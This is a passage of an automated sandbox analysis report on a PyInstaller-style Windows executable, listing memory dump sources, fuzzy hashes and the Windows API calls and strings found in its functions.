                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                            • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                            • Instruction ID: 1018d420bc4576bb4e78e3352b4c7e5d447be61324c602785fa081507e9a0f08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B31C121B1EB02D1EE11AB82A4026B53394FF48BA4F994735DD3DAB389EF3CE4449710
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF633D6351A,?,00000000,00007FF633D63F1B), ref: 00007FF633D62AA0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                            • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                            • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                            • Instruction ID: 5e051762cfbcc9d9c02d9a40582793537229a18107c4dca1f2d83445d9370648
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F21A33261978182E7209B91F8427E67394FB88784F800236FE9CA3759DF7CD1459740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
• Instruction ID: 85ca96772ff03f063ac1d8247f753327b3eae382b12b32df1e19e35e9204c46f
• Opcode Fuzzy Hash: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
• Instruction Fuzzy Hash: C4216031A0C64642EB108BD5B54523AB3A0FF857A1F901335EABD97BE5DE7CE4459B00
APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
• Instruction ID: 86d6940a3b2219007d66e191e412a291f70027244548114bd368ba9229ea2f96
• Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
• Instruction Fuzzy Hash: 8B215B20F0D24281FA686FE19A5323952525F447B0F144734ED3EFBBD6DE2CB455A300
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction ID: af53bc2dcb930963b7421398c021bcd4b1365de1eeb1f8282b70542f2ad61348
• Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction Fuzzy Hash: 6711B621B18B4286E7508B92F85632963A0FB88FE4F040334EA6DDB7A4DF3CE9148740
APIs
• GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68EFD
• K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68F5A
  • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68FE5
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69044
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69055
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D6906A
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
• Instruction ID: 2cd8b1c69494db67d0b1a953af33810459aa8d9b5b5905be50cc7c462e16ab18
• Opcode Fuzzy Hash: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
• Instruction Fuzzy Hash: 2141B961B19A8281EB309B91A5422BAB394FF85BC4F841235DF6EE7789DF3CE511D700
APIs
  • Part of subcall function 00007FF633D68570: GetCurrentProcess.KERNEL32 ref: 00007FF633D68590
  • Part of subcall function 00007FF633D68570: OpenProcessToken.ADVAPI32 ref: 00007FF633D685A3
  • Part of subcall function 00007FF633D68570: GetTokenInformation.ADVAPI32 ref: 00007FF633D685C8
  • Part of subcall function 00007FF633D68570: GetLastError.KERNEL32 ref: 00007FF633D685D2
  • Part of subcall function 00007FF633D68570: GetTokenInformation.ADVAPI32 ref: 00007FF633D68612
  • Part of subcall function 00007FF633D68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF633D6862E
  • Part of subcall function 00007FF633D68570: CloseHandle.KERNEL32 ref: 00007FF633D68646
• LocalFree.KERNEL32(?,00007FF633D63C55), ref: 00007FF633D6916C
• LocalFree.KERNEL32(?,00007FF633D63C55), ref: 00007FF633D69175
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
• Instruction ID: 52e6a2a20fb17ffffbb22bd5cc981b543d1c9b245fb98ce262a9502fd989064b
• Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
• Instruction Fuzzy Hash: BF213231A0874281F6109B90E9162FA7261FF84780F945236EA5EE77D6DF3CE945E740
APIs
• GetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B30D
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B33A
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B34B
• FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B35C
• SetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B377
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Value$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                            • Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                            • Instruction ID: 187532b38a27bdcbbcd2acae768bcb6fc113820c00d8ea0740a003fdd47af6c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC114F20F0C64282FA686FA1965323D62569F45BB0F544734E93EFB7E6DE6CF4916300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007A3440ErrorLast
                                                                                                                                                                                                                                            • String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
                                                                                                                                                                                                                                            • API String ID: 848807496-4291904164
                                                                                                                                                                                                                                            • Opcode ID: 7943f625b7d20c5b2a256d95b4f9ffa19be6ef3d4345ba9e1828761067b97a59
                                                                                                                                                                                                                                            • Instruction ID: dccf1b334737eb92ba4a9ac5fa87493ceea3a452a62c8a5f12c3231f5088c01a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7943f625b7d20c5b2a256d95b4f9ffa19be6ef3d4345ba9e1828761067b97a59
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9716261B1C78285FB58BB1194B0BB93351AF85788F4101B5EE5F47BDEDE3EE9068600
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF633D61B6A), ref: 00007FF633D6295E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                            • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                            • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                            • Instruction ID: afd009434f3403cab6d77ae120dfd1b90e560974ea6bd378f7d987ca72e5539d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29310872B1968152E7209BA5A8426E77395BF887D8F800232FE9DE3755EF3CD146D700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                            • Opcode ID: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                                                                                                                                                                                                            • Instruction ID: 82e56ad8a0df23da2c5ca72204515ecf9651ba7de6e1197dacfbe79d7a3fddff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4318772619A8185EB20DFA1E8562F97360FF88788F840235EA4DDBB59DF3CD145D700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF633D6918F,?,00007FF633D63C55), ref: 00007FF633D62BA0
                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF633D62C2A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                            • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                            • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                            • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                            • Instruction ID: f9e216a77434f41ddc6c2818c5590be12bae5bfbd5c22c3e413d37561858f23e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221F732708B4192E7119B94F8467EA73A4FB88784F805236EE8DA7756DF3CD215C740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF633D61B99), ref: 00007FF633D62760
                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3AF
• FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3CE
• FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3F6
• FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B407
• FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B418
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
